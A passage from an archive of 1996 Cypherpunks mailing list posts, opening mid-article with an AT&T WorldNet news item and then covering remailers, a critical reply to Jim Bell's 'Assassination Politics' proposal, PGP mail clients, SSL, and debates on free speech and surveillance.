Card Services, as well as to corporate users of
WorldNet's LAN (local area network) Service who use their
Universal Cards upon registering for WorldNet, said Tom
Evslin, VP of AT&T Gateway Services, speaking during the
teleconference.

Some $200 billion in sales were conducted over AT&T's 800
numbers last year, in comparison to only $500 million in
sales over the Internet, Evslin pointed out.

"Secure credit card" technology is an important
ingredient in spurring more electronic commerce, the VP
acknowledged, noting that AT&T is one of the partners in
the new SET (Secure Electronic Transactions) alliance
unveiled by Mastercard and Visa last week.

But based on the results of studies conducted by AT&T
among consumers, it is just as important that consumers
"feel safe" in doing business online as that they "be
safe," Evslin told the reporters and analysts. 

"What's important to consumers is that AT&T put its money
where its mouth is, rather than ask consumers to take the
risk," the VP asserted. 

AT&T will launch the new "deductible fee waiver" in
conjunction with the availability of dial-up access to
WorldNet, a new Internet "content aggregation" service
now in beta, by the end of this quarter, according to
Evslin. AT&T rolled out the WorldNet LAN Connectivity
Service together with BBN Planet last fall.

AT&T plans to be "aggressive" in promoting WorldNet in
the US and overseas, though mechanisms that will include
cross-marketing programs with AT&T Universal Card Service
as well as with third-party partners such as Netscape,
Verity, McKinley, and as of last week, Broderbund, he
told the press.

AT&T Universal Card now has more US card holders than any
other credit card, according to Evslin. The AT&T also
told reporters that he expects other credit card
companies will follow AT&T's lead in suspending the $50
deductible charge in online transactions.

--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Wed, 7 Feb 1996 16:31:52 +0800
To: cypherpunks@toad.com
Subject: Re: [noise] the individual and the tribe
Message-ID: <199602070809.DAA18614@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jean-Francois Avon (JFA Technologies, QC, Canada) wrote:

I originally said:

> > ... in the sense that
> >tribal societies are individualist.
> 
> I absolutely don't agree.  The subordination of the individual to the tribe
> is fundamental of their vision of the world.  Individualism is not about
> personnal opinions, it is about the vision of Man as an entity in itself, 
> a type of cattle that owe his service to the collectivity of the tribe.

Beware of stereotypes about "tribal culture".  The individualism in a
tribal culture is different than in western society.  In some ways the west
is way more collectivist than tribal societies... taxes, public works,
laws... even the bare minimums that would exist in libertarian societies.

Certain forms of self-expression and practices with regards to sexuality,
drug use, etc. are quite acceptable in some tribal cultures... even
encouraged over western conformism.

The use of myths with regards to nationalism and cultural purpose is actually 
a western phenomenon.  Creation myths, "how we got here" etc. stories have 
different functions in tribal socieities, and are not used as a 
rationalization of collectivism or submission to the will of the tribe.

Decision making in tribal cultures generally is often based on group 
consesus... if no consensus is reached, no decision is made.  Disagreement is 
acceptable, and in some cultures also encouraged as a sign of adulthood. In 
western collectivist societies there is decision by manufactured consent of 
the majority in an air of perpetual crisis.... a tyranny of the majority.


> 
> Crypto makes the tribe (and it's sorcerers) loose their grip... :)

Tribes aren't run by chiefs or sorcerers.  Large industrial nations are.

Rob.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMRheMyoZzwIn1bdtAQHtQAGAyvJmtmErKscUNS5WZUAlPrcFJpSKJxJg
c/VoBAcOd/dmF6wvyUO4EuZ9q6PS4xb3
=hjlN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Wed, 7 Feb 1996 20:24:05 +0800
To: cypherpunks@toad.com
Subject: Re: paper on remailers in the intelligence community
Message-ID: <v02120d00ad3e08fa80a7@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 12:37 AM 2/7/96, Timothy C. May wrote:

>But more seriously, any mil-info complex effort to demonize remailers must
>of course invoke one of the Horsemen. At this time, "Russian Mafia
>terrorists" is the putative focus of joint U.S.-Russian intelligence
>activities, and was even the plot of the latest James Bond movie.

        Yup. <sigh>
        In essence, remailers and other anonymizing/pseudonymizing
techniques democratize "deniability"--the MO of circumventing the law that
states have arrogated to themelves. Institutional dynamics aside, the
proverb that "A man reveals his character best when describing that of
another" applies to governments, too, I think: we can expect governmental
and paragovernmental anti-anonymity arguments to focus on the most extreme
ways in which governments have used their power to modulate identity--i.e.,
law-breaking.
        I don't want to start up a Cypherpunk[TM]-approved PR debate, but I
do think we (quote unquote) might do well to think a bit about some
arguments that can sidestep the arguments we can reasonably anticipate.
Plenty of folks have very recognizable nyms, so... nym as PO box, nym as a
way of tracking who's tracking you (like misspelling your name this or that
way when you know the organization you're giving it to will sell it), nym
as backup (for when your mailserver's down [yeah, I know...]). Anonymity,
after all, is only one of many possible uses for a remailer. No one could
possibly require that your email address bear your first and last names in
recognizable form--so what's so different about a nym?
        In terms of the fundamental issues, these are sidelights,
obviously, but they could come in handy. US culture has a deep-seated
mistrust of unstable identities (viz., the "con man") going back a century
or more; fighting on behalf of unstable and multiple identities will be an
upstream swim. But we might do pretty well arguing that remailers are more
similar to than different from net.staples--nutty email addresesses,
multiple addresses, etc.
        Sometimes the best way to win an argument is to refuse to have it.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Wed, 7 Feb 1996 20:10:52 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I	  wrong?
Message-ID: <v01530502ad3e1d84c0f3@[204.179.169.95]>
MIME-Version: 1.0
Content-Type: text/plain


>>>1.  Governments will no longer be "necessary," if they ever were.
>>2.  Protection will no longer depend on having a "government."
>>>3.  Anonymous networking technology will protect our rights, to the extent
>>>they can be protected.
>>>4.  Your statement, "...anarchy is a massive step backward..." is absolutely
>>>incorrect.
>
>>That's fine that you believe the things, but for acceptance by others you
>>will have to provide support for your position.  I, personally, would like
>>to see your premises so that I may evualuate your claims.  You may indeed
>>be correct in your assessment.
>
>Well, here's  my "Assassination Politics" essay.
>

You all should have a copy of this, so I won't waste bandwidth posting it
again.  If you didn't read it, I encourage you do to so, no matter what
your initial reaction is.  It is a facinating proposal and it brings to
mind a multitude of questions about privacy, anonymity, ethics and the
nature of human beings in general.

Now, in respose to Mr. Bell.  As I stated above, I found your proposal
absolutely facinating, to say the least.  As with many others, I'm sure, it
struck an initial chord in me that tempted me to disregard it out of hand.
However, I was determined to read it through thoroughly and without bias.
I have done so and I have the following thoughts about it.

The plan it self is feasable, and with more thought, all the wrinkles could
be ironed out.  I am impressed with the detail of it.  I would be curious
to see what an open minded laywer would say about it's legality under close
scrutiny.

However, I must point out, and I'm sure you realize this, that it would not
be adopted by the public at large for some time to come, or more likely
never.  There are too many people who believe that it is wrong to take a
life for any reason and that no action justifies death.  I count myself
among these people.  The barganing power of death is indeed great, but some
would still realize that a vote would make them responsible, at least in
part, for a murder.  There is an ethical stumbling block here that may
never be overcome.

Further, I don't believe you have enough support for your claim that other
targets would not be sought.  It is one thing to say that enough people
won't vote for someone picked out of the phone book, but what if the
predicted individual is a doctor who performs abortions, or an activist for
gay rights (or *against* gay rights), or Bill Gates ;-).  There are also
the individuals who are trying to bring about change in society that is
unpopular, but is still in the interest of humanity.  Abraham Lincoln
surely would have been killed by this system, for example.  Also, big
corporations would be able to cut down their political enemies such as
envornment activists, fair business practice activists and competetors'
high ranking officers.  Even if only one person in charge of such a
business were to put out a digital contract, he would have no problem
suppling the money for the hit.  People who have tried to make changes for
humanity that went against the social norm at the time are revered today
for their efforts.  In this system, they would likely be assasinated.
Nothing would ever change because people are always afraid of change and
afraid of things they do not understand and the people who fight that
ignorance will likely be killed.  Your statement that Organization B, the
one that collects for any target, is not well supported.  They would still
be doing *plenty* of business, in spite of the higher prices.

Organization B would thrive, make no mistake.  And the people who would be
getting in on all the action are the rich.  All the politicians who oppose
their interests would be hit immediately.  Anyone trying to change the
status quo would be eliminated.  Why do you think we are still using
combustion engines in the last decade of the 20th century?  We could have
had better alternatives 20 years ago, but the oil companies would loose out
so they have either bought out these ideas or had killed the inventors and
bought their patents and are sitting on them.  A capitalist economy does
not always breed competition that brings out the best and most desireable
products because some advancements are bad for all the businesses involved
in that market.   Big business and the rich would benifit the most from the
Assination Politics model.

 But what if OrgB stops taking donations for "predictions" for
"Non-Initiation Of Force Principle" (NIOFP) offenders?  Some other
organization will crop up to take their place AND the people operating OrgB
could be hit for their "ethical" action.  There is simply too much
opportunity offered by OrgB type organizations for people to pass up.  They
will not let the higher prices stop them.

If the answer to that problem is to regulate the lists of "victims", then
the next question is who are these people who are regulating and what
guidelines are they following?  Who decides who gets to be the moderators?
Could there be exceptions to the (NIOFP)-offender standard?  Who would they
be and why?    Could the organizations be anonymous as well?  How would the
money be transmitted to them in that case?  How can we trust or redress
grivances with an organization?  There are still many concerns regarding
the organizations.  If the organizations fail, the whole system fails.

That's all I can think of at the moment.  Like I said before, once one can
get past the bias, it is an endlessly intriguing proposal bristling with
questions and issues concerning our very beings.

This is precisely why I would like to know if I may take a copy of your
proposal to my ethics class.  I think this is a great topic for discussion
and I would like your approval.

Respectfully,
Jeff Conn

lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBvAzD3EHEAAAEDAMVwZzXozPjX18mCenA5fJsdWZXcrhJCxPR+SoVCmR7d4ZVU
mwITzPTHo/GyLvJrWyk5YdhheczyY2VSawaMrCN/nWA7K9lwAylbKyPxqBhRYJ3C
2wi2uD5LY2wypNOQyQARAQABtB5KZWZmIENvbm4gPGx1bmFzbGlkZUBsb29wLmNv
bT6JAHUDBRAw+1bqS2NsMqTTkMkBAQkTAwCersFbCyk8O0MbGlNcZDAe24CLEWQ0
0C5EHni33W76UsG1bybcLsuMH6HVwLF7IqZivnzc7wkujYPQvCqn8HEYYTld8V9V
Cou4dOvA8kV7rHvAn/LuLx7DRruLFrRoPSk=
=OIT9
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Wed, 7 Feb 1996 20:25:05 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: has this been on cypherpunks? (fwd)
Message-ID: <199602070853.DAA14781@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I just sent this to the remailer operators' list, but it may be of interest
here too. I think Tim or Lucky or someone suggested something like GAI
(Government Access to Identities) here a while back....

Forwarded message:
> Lance writes:
> > Is it just me, or does this guy make a convincing case for the need for
> > remailers without ever showing one shred of evidence to back up his fear
> > mongering?
> 
> Exactly. Ted Byfield mentioned on cpunks that it reads like a free
> association session. I find the piece quite schizophrenic. (IANA 
> psychologist :)  They alternate between fairly eloquent arguments for the
> roots of remailers in fundamental principles of freedom and privacy, and 
> the bizarre "anonymity as a disease" analogy. 
> 
> I hypothesize that the Strassmann & Marlow paper is meant to lay the 
> groundwork for some sort of eventual Government Access to Identities proposal
> (which would more likely be termed "identity escrow" by the Feds). It's 
> about the only way I can reconcile statements like the following 
> (juxtaposed by me, not them):
> 
> 	"...it becomes politically unacceptable to suppress remailers
> 	as potential sources of criminal acts. Such absolute 
> 	prohibitions would never pass through a legislative process...."
> 
> 	"As in the case of [various diseases] it will take disasters
> 	before the public may accept that some forms of restrictions
> 	on the electronic freedom of speech and privacy may be
> 	worthwhile."
> 
> 	"We trust that this will be seen as a useful contribution to an
> 	already raging debate of how to find a balance between the
> 	desirable and the dangerous."
> 
> I suspect the key phrases there are "absolute prohibitions", "some forms of
> restrictions", and "find a balance". 
> 
> I'm still surprised that the paper takes such a conciliatory stance towards
> anonymity and pseudonymity. Strong crypto and GAK-free crypto have big 
> corporate constituencies, but I see strong and GAI-free anonymity/pseudonymity
> as much more vulnerable. I'm tempted to declare this a guarded preliminary
> success of the cpunks remailer community -- we are seen as a viable player
> in "the game", potentially capable of forcing at least a compromise on
> nymity issues.
> 
> -Lewis
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Wed, 7 Feb 1996 21:37:55 +0800
To: cypherpunks@toad.com
Subject: Re: How to prevent a virus infection :-)
Message-ID: <199602071316.IAA19827@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Lucky Green wrote:
> 
> Just watched an "expert" on Bay TV (SF Cable). He stressed that websites
> without firewalls pose the risk of spreading viruses when downloading files
> from them. A  GIF was being downloaded in the background...

(chuckling) I remember when one of the Michaelangelo scares was going on 
(hey, is it that time of year again?) the place where I was working got a 
telemarketing call selling anti-virus software.

String that one up with conspiracy theories...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMRimFioZzwIn1bdtAQHyIAF/YKlGvU0JeP9V4+VoDHksXn0SCd6wE86x
1HptGTwiHjH1I/BhjRLyY9xiCFqNLwSf
=Kqj2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geoff klein <geoff@commtouch.co.il>
Date: Wed, 7 Feb 1996 16:16:11 +0800
To: cypherpunks@toad.com
Subject: Fw: Release of Pronto Secure first Beta
Message-ID: <9602070734.AA20515@commtouch.co.il>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: multipart/mixed;
	boundary=d4os3ia2um1ynatbsrvdecfwxgqzhl

To: cypherpunks@toad.com
Date: Wed Feb 07 09:53:01 1996
> THIS IS A MESSAGE IN 'MIME' FORMAT.  Your mail reader does not support MIME.
> Some parts of this will be readable as plain text.
> To see the rest, you will need to upgrade your mail reader.
- --d4os3ia2um1ynatbsrvdecfwxgqzhl
Content-Type: text/plain
Content-Description: Fw: Release of Pronto Secure first Beta


The previous version of this message was posted to the list in ascii-armor,
my embarrassed apologies to all.

To: All who have already applied -  you will be receiving a message with 
down load instructions before the end of the week.

New applicants are also requested to mail me their public keys, please.

Thanks, Geoff

- -----Begin Included Message ----- 

Date: Tue, 6 Feb 96 18:52:41 IST
 From: geoff klein <geoff@commtouch.co.il>
To: cypherpunks@toad.com
Cc: 

To: cypherpunks@toad.com
Date: Tue Feb 06 19:12:56 1996

Commtouch has decided to offer a controlled release of Pronto Secure to the 
Cypherpunk community. We believe that scrutiny of the product by members of 
this list will help us to release a safe and secure E-mail client.

Pronto Secure is an Internet E-Mail client for Windows, which uses external 
security providers to enhance e-mail with cryptographic security features. 
The current beta version relies on the proven security facilities of PGP to 
provide encryption, authentication, integrity and key management features.
Future versions will include S/Mime and MOSS compliance.

Product requirements: 
- - MS-Windows 3.1 / Windows for Workgroups 3.11 / Windows 95 / Windows NT
- - Winsock 3.11 compliant environment (TCP/IP stack)
- - Installed version of PGP.

We plan to make Pronto Secure available via FTP at the end of this week. 
Parties interested in joining the beta-test program are invited to send me 
pgp-signed e-mail requesting down load instructions and our public key for 
authenticating the version. Beta-testers who provide us with feedback will 
be eligible to receive a free final release version. Sorry no T-shirts, but 
we guarantee that you'll get more wear out of Pronto Secure :).


- -----------------------------------------------------------------
Geoff Klein                          email: geoff@commtouch.co.il
Product Manager - Pronto Secure      http:    //www.commtouch.com
- -----------------------------------------------------------------
CommTouch SW Inc,  U.S                          CommTouch, Israel  
1206 W. Hillsdale Blvd                          10 Technology Ave  
San Mateo,    CA 94403                          Ein Vered,  40696  
Tel:    (415) 578-6580                          Tel: 972(9)963445  
Fax:    (415) 578-8580                          Fax: 972(9)961053  
- -----------------------------------------------------------------


- ---- End of forwarded message ----
- --d4os3ia2um1ynatbsrvdecfwxgqzhl--
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMRhaXULv5OMYFK1FAQHG5AP9FyxJgjFRo5Y8iuFtMIZXmhWZA9XtD3mV
YJrLglBpdOsYpKkaqy9NfTooAdIUzqfytc6MDuwDZCWbAiS9lHNMZSHUXXo6s95z
NoIBeEG6qReoGBc0XsNxR/UUQ1vER88gbM4W3jrWv3zPEIV6Yo8y/tv4BbfHfhdH
FOX9htLNeQg=
=zDru
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m.purcell@navy.gov.au (LEUT Mark Purcell)
Date: Thu, 8 Feb 1996 06:24:34 +0800
To: Cypherpunks Lite <cp-lite@comsec.com>
Subject: Re: Windows PGP mail reader
In-Reply-To: <4eaksb$6i9@recepsen.aa.msen.com>
Message-ID: <199602072057.MAA27735@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <4eaksb$6i9@recepsen.aa.msen.com>, jims@conch.aa.msen.com says...
>
>Hi.  Can anyone recommend a Windows based email/POP3 reader that can decrypt
>content?  Please reply  via email:


Have a look at Pegasus Mail.  It handles PGP very nicely with a recent
addition. by John Navas, both are free:  
http://users.aimnet.com/~jnavas/winpmail.htm

Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Simson L. Garfinkel" <simsong@vineyard.net>
Date: Thu, 8 Feb 1996 08:19:44 +0800
To: simsong@vineyard.net
Subject: Re: FV's blatant double standards
Message-ID: <199602060139.UAA03880@vineyard.net>
MIME-Version: 1.0
Content-Type: text/plain


Yes, clearly if you are not concerned about missing 50-75% of First Virtual's 
users, this attack will work just fine.
-simson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Thu, 8 Feb 1996 09:23:14 +0800
To: cypherpunks@toad.com
Subject: Re: "PGP-Scape"? (was Re: Our "New Order")
Message-ID: <199602060726.CAA12115@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

cp@proust.suba.com (Alex Strasheim) wrote:
>> There's also less worry about secure transactions, since if 
>> everything's encrypted it's harder to tell if a transaction is taking 
>> place, viewing porno or subversive or religious, literature,  or if
>> you're just reading something mundane.
>
>I think I must be missing something here.  Aren't you describing an SSL 
>web server?  Different algorithms, but basically the same idea?

No. SSL doesn't encrypt everything, just certain transactions (or am I 
wrong about this?)  Something that keeps everything encrypted and 
anonymous.

>Netscape 2.0 is out for real -- everyone can now pick their certs.  GAK 
>just got harder.

As opposed to the imaginary beta?



- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMRcCsyoZzwIn1bdtAQEZYAF6Aql41weD0Dz+7aQbQ+OFyXeb8fPgoO9n
o/muL79oNXntntKcqmaqSHWsxz/VuTX1
=69yF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Thu, 8 Feb 1996 09:18:38 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Likely application for high-bandwidth proxies (fwd)
In-Reply-To: <Pine.BSD.3.91.960206065604.5857H-100000@usr6.primenet.com>
Message-ID: <199602060736.CAA10630@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


attila writes:
> 	come on Lewis...  where's the sight <sic> address? 

Project Genesis <genesis@j51.com> forwarded:
> > > >http://www.[I don't plan to help them].com 

I didn't obfuscate the URL; that was done by the person who forwarded the
message to list-managers (where I saw it). Maybe you can find it with Alta
Vista. Since they were apparently spamming mailing lists, maybe someone has
already pulled the plug on them.

-Lewis	"Despite all my rage, I am still just a rat in a cage" -Smashing P'kins




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Thu, 8 Feb 1996 09:20:37 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Likely application for high-bandwidth proxies (fwd)
In-Reply-To: <Pine.BSD.3.91.960206065604.5857H-100000@usr6.primenet.com>
Message-ID: <199602060747.CAA10602@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


attila writes:
> 	on a little more serious point; the use of multiple high
>     bandwidth proxies is fast becoming essential 
[...]
>     The only clinker is 
>     the big sites are startig to require registration with legal warnings 
>     --next of course is payment and they want a credit card --not a check
>     or cybercash --a credit card for open debit. 

This makes it harder for transitory proxies, but not for fairly permanent
ones, I suspect. An outfit like C2 could presumably register with a corporate
credit card. Its proxy then carries connections paid-as-you-go with e$, or
paid in chunks in advance with a check.

-Lewis	"Despite all my rage, I am still just a rat in a cage" -Smashing P'kins




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Thu, 8 Feb 1996 09:22:55 +0800
To: cypherpunks@toad.com
Subject: Re: Marshall McLuhan and encryption...
Message-ID: <199602060846.DAA12400@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada)) 
wrote:
>
>>  Nick's a big shot at Wired magazine.  So it should be no surprise 
>>  to learn that Wired attacked cypherpunks in its 01 96 issue.  In 
>>  a fake interview with "Wired's patron saint," Marshall McLuhan is 
>>  made to say (p 130): 
>> 
>>    Concerns about privacy and anonymity are outdated. Cypherpunks 
>>    think they are rebels with a cause, but they are really senti- 
>>    mentalists. 
>
>Well, maybe McL. would have spit such nonsense, very characteristical of him.
>
>"The media is the message" is among the biggests con jobs performed on humanity.
>It's like having a guy dying form thirst and telling him: "The pipe is the beverage"...

Actually, that is a common distortion of McLuhan.  When McLuhan said
that, he meant that the use of a medium (by "medium" he meant any 
technology)
communicated more than just its content.  What he found interesting was
the effect of a lot of people watching TV, the same channels at the same
time, as being meaningful itself, irregardless of what was on the TV.

He probably would not have been anti-crypto, IMO, and would have found
its widespread usage as signifying something... the cryptomedium would
be a message independent of the encrypted messages.

As for this crapola about privacy concerns being outdated, they are very
much up-to-date.  The traditional public/private distinction has quite a
few philisophical problems, but the concerns are more imporant now than
a hundred or a thousand years ago.

If anything, the crap that Nick pupports is what's outdated... the public
individual in the polis is long dead, in part because of mass media.
Note that traditional/modernist/existential conceptions were 
pro-identity.
Postmodern critiques are anti-identity; anonymous dividualism is a mode
of resistence to the "15-minutes-of-fame" hype.

Recommend you read Foucault's "Subject and Power" and Deleuze's
"Postscript on the societies of control".  [Oh yeah, the Wired people
did a nice spin calling Foucault an alt.sex.bondage neo-Stalinist.
Ad hominim attacks are wonderful, aren't they... but that's another 
thread]

[..]
>
>Dear Wired peoples and Mr. McLuhan: get lost!

Wired I wdn't miss. McLuhan? He's dead, and probably would have
thought crypto to be a good thing.  But it's just like a church to
fingerpuppet dead prophets into spouting the current dogma.  The
Wired people are too busy paying abblutions to McLuhan's shadow on
the cave walls.

[..]
>     He is partially right.  With Renaissance, came the idea that Reason and human mind 
>were powerfull and that knowledge, because man's only survival tool is reason, is a value 
>to pursue.  
>
>But french revolution did not convey theses ideas, neither
>did Napoleon.  And Hitler definitely not.   
>All of the three were, ultimately, collectivists or looters.

Yep. And McLuhan was actually an individualist, in the sense that
tribal societies are individualist.  There's a difference between
communitarianism and community, between socialism and sociability.

Rob.


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMRcVTCoZzwIn1bdtAQG09QGAkMfFQbAJaPY0YQhGPRhWcWb0xZ1omNCA
/4aHBk2F1Xy8pHR3yoADG7+f2sSBfgK4
=uuA5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Thu, 8 Feb 1996 06:24:37 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: PGP-Scape
Message-ID: <199602061309.IAA15241@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


> >No. SSL doesn't encrypt everything, just certain transactions (or am I 
> 
> WRong.

Ok.... that part's settled.


 
--- "Mutant" Rob <wlkngowl@unix.asb.com>

Send a blank message with the subject "send pgp-key"
(not in quotes) for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Thu, 8 Feb 1996 06:24:05 +0800
To: dlv@bwalk.dm.com
Subject: Re: free speech and the government
Message-ID: <Pine.BSD.3.91.960206082318.15126A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Dmitri, 
 
 
  On 02 03 96 you say: 
 
    I believe that any exception to unlimited free speech, be it 
    libel, or copyright violation, or child pornography, or Nazi 
    propaganda, or Chinese dissident materials, just isn't com- 
    patible with the cpunk agenda. No censorship is acceptable. 
    That's an absolute. 
 

  Censorship is founded on prying; and pryers have THEIR absolute: 
 
    On 2 January 1992, it was decided by the German Federal govern- 
    ment to open these [East German police] files...at 15 offices 
    throughout the former East Germany.  It is worth pointing out 
    the extensive nature of these files.  It was discovered that 
    husbands spied on wives, girlfriends spied on boyfriends, Cath- 
    olic Church confessionals were bugged by the 'Stasi' both with 
    and without the knowledge of the parish priest, Lutheran parish- 
    ioners spied on their pastors, telephone calls of both East and 
    West Germans were heavily monitored and the most innocent event, 
    such as going shopping or visitng the library, was included in 
    the files. 
 
        --Wayne Madsen [co-author of the upcoming new Puzzle Palace]. 
          Handbook of Personal Data Protection.  Stockton Press. 1992. 
          Page 4. 
 
 
  Pryers agree!  No censorship is acceptable. 
 
 
                       A*N*Y*T*H*I*N*G goes. 
 
 
  But let's be scientific about it: 
 
    Some 30 miles from Boston is a radio telescope called Beta, run 
    by the Harvard-Smithsonian Centre for Astrophysics, that day and 
    night searches the northern sky for artificial radio signals as 
    it makes continuous swathes through the heavens.
   
    It must pick up all the naturally-caused radio sounds as well, 
    which engineers call "noise" as opposed to "signal". This means 
    that it collects an enormous quantity of information that can be 
    processed only by a specially-built supercomputer.  Every second 
    it captures enough data to fill a CD-Rom, which every day adds up 
    to 22 trillion bytes of data, the equivalent of 52 million novels. 
 
        --Adrian Berry.  "Watch This Space."  File: nspace04.html. 
          Home News.  02 05 96 The Electronic Telegraph. 
 
 
  A USEFUL gadget, isn't it?  Censorship of even 1 byte of the 22 tril- 
  lion is unacceptable. 
 
 
                     E*V*E*R*Y*T*H*I*N*G goes. 
 
 
  Between two absolutes, what decides?
 
 
  Cordially, 
 
  Jim 
 
 
 
  PS:  I can't help wondering whether "all the naturally-caused 
  radio sounds" are really all the artificially-caused microwave 
  signals within range. 
  
      Of all the intercept stations built during the 1950's boom, 
      the ultimate in both ambition and failure was in the remote 
      Allegheny hollow of Sugar Grove, West Virginia.... 
 
      Since its beginnings in the mid-1950s, the secrecy surrounding 
      Sugar Grove has been intense.  The cover story throughout the 
      entire life of the project was that the six-hundred-foot dish 
      was purely for research and radio astronomy, permitting scien- 
      tists "to tune in on radio signals as far as 38 billion light 
      years away".... 
 
          --James Bamford.  The Puzzle Palace.  Penguin Books. 1983. 
            Pages 217f, 220. 
 
 
 
      Supposedly, the only person allowed to look into each of the 
      East German police files was the "data subject," the person who 
      had been looked into. 
 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Thu, 8 Feb 1996 06:23:13 +0800
To: ericm@lne.com
Subject: Re: free speach and the government
Message-ID: <Pine.BSD.3.91.960206082523.15126B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Eric, 
 
 
  On 02 03 96 you say: 
 
     In the US the media is by and large controlled by huge media con- 
     glomerates with a vested interest in maintaining the status quo and 
     delivering up their audience to their advertisers in tidy packages. 
 
     The government is along for the ride, being part and parcel of the 
     same system.  They won't rest until net-speech is by and large con- 
     trolled by huge media conglomerates all busy delivering up the net- 
     public to advertisers in tidy packages... I'm not saying that there's 
     a Black Heliocopters type conspiracy, or any other for that matter. 
     There doesn't have to be, there are huge political forces moving 
     things this way.  So there might as well be a conspiracy, as the end 
     effect on us is the same. 
 
 
  Your analysis is excellent.  Thank you. 
 
  Often "anti-statist" conspiracy theorists have the bare facts right, but 
  explain those facts from the same point of view as statists: the State 
  is all-powerful; it is THE conspirator! 
 
  "The" State tends to the monopoly of force; but THIS State is dependent 
  on taxes, for it exists in THIS capitalist economy led by huge "conglom- 
  erates"  (the word may not be exact but it will do) that tend to control 
  the supply of taxes (by splitting up, by dumping loyal workers, by crea- 
  tive accounting, by moving away, by influencing the bureaucracy through 
  a maze of advisory panels, by directly staffing the upper reaches of that 
  bureaucracy, by timely contributions to journalism schools, by...ingenu- 
  ity). 
 
  In its preeminent meaning, politics refers only to the State. However, if 
  we gracefully relent, 
 
        ...there are huge political forces moving things.... 
 
  Generally, this overall movement is not a conspiracy. 
 
  Specifically, the movement involves an unbreakably large number of "per- 
  manent" and temporary alliances, coalitions, blocs, nods and winks, in- 
  siders, cliques, rings, gangs, and...you name it. 
 
 
  Cordially, 
 
  Jim 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 8 Feb 1996 08:39:54 +0800
To: lunaslide@loop.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I wrong?
Message-ID: <m0tjx35-0008zlC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain



>>1.  Governments will no longer be "necessary," if they ever were.
